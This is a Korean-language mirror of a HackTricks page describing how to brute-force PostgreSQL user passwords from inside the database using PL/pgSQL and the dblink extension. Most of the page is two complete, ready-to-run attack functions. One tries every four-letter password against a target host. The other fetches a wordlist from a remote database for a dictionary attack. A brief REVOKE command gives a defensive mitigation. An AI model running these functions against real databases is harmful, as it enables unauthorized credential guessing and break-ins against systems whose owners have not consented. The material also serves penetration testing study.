mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
5.9 KiB
5.9 KiB
PL/pgSQL 비밀번호 브루트포스
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!
- 사이버 보안 회사에서 일하시나요? 회사를 HackTricks에서 광고하거나 PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? SUBSCRIPTION PLANS를 확인해보세요!
- The PEASS Family를 발견해보세요. 독점적인 NFTs 컬렉션입니다.
- 공식 PEASS & HackTricks 스웨그를 얻으세요.
- 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter에서 저를 팔로우하세요 🐦@carlospolopm.
- 해킹 트릭을 공유하려면 PR을 hacktricks repo 및 hacktricks-cloud repo 에 제출하세요.
원본 논문에서 이 공격에 대한 자세한 정보를 찾아보세요](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt).
PL/pgSQL은 SQL의 기능을 확장하여 프로시저 제어를 향상시키는 완전한 기능을 갖춘 프로그래밍 언어입니다. 이는 루프와 다양한 제어 구조의 활용을 포함합니다. PL/pgSQL 언어로 작성된 함수는 SQL 문과 트리거에서 호출될 수 있으며, 데이터베이스 환경 내에서의 작업 범위를 확장합니다.
이 언어를 남용하여 PostgreSQL에게 사용자 자격 증명을 브루트포스하도록 할 수 있지만, 데이터베이스에 존재해야 합니다. 다음을 사용하여 존재 여부를 확인할 수 있습니다:
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+---------
plpgsql |
기본적으로, 함수 생성은 PUBLIC에게 부여된 권한입니다. 여기서 PUBLIC은 해당 데이터베이스 시스템의 모든 사용자를 의미합니다. 이를 방지하기 위해 관리자는 PUBLIC 도메인에서 USAGE 권한을 취소해야 할 수도 있습니다.
REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;
그 경우에는, 이전의 쿼리는 다른 결과를 출력할 것입니다:
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+-----------------
plpgsql | {admin=U/admin}
다음 스크립트가 작동하려면 dblink
함수가 존재해야 합니다. 존재하지 않는 경우 다음과 같이 생성해 볼 수 있습니다.
CREATE EXTENSION dblink;
비밀번호 무차별 대입 공격
다음은 4자리 비밀번호 무차별 대입 공격을 수행하는 방법입니다:
//Create the brute-force function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
word TEXT;
BEGIN
FOR a IN 65..122 LOOP
FOR b IN 65..122 LOOP
FOR c IN 65..122 LOOP
FOR d IN 65..122 LOOP
BEGIN
word := chr(a) || chr(b) || chr(c) || chr(d);
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;
EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection
THEN
-- do nothing
END;
END LOOP;
END LOOP;
END LOOP;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql';
//Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
참고로, 4자리를 무차별 대입해도 몇 분이 걸릴 수 있습니다.
또한 워드리스트를 다운로드하여 해당 비밀번호만 시도할 수도 있습니다 (사전 공격):
//Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
BEGIN
FOR word IN (SELECT word FROM dblink('host=1.2.3.4
user=name
password=qwerty
dbname=wordlists',
'SELECT word FROM wordlist')
RETURNS (word TEXT)) LOOP
BEGIN
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;
EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection THEN
-- do nothing
END;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql'
-- Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!
- 사이버 보안 회사에서 일하시나요? 회사를 HackTricks에서 광고하고 싶으신가요? 아니면 PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? SUBSCRIPTION PLANS를 확인해보세요!
- The PEASS Family를 발견해보세요. 독점적인 NFT 컬렉션입니다.
- 공식 PEASS & HackTricks 스웨그를 얻으세요.
- 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter에서 저를 팔로우하세요 🐦@carlospolopm.
- 해킹 트릭을 공유하려면 PR을 hacktricks repo 및 hacktricks-cloud repo 에 제출하세요.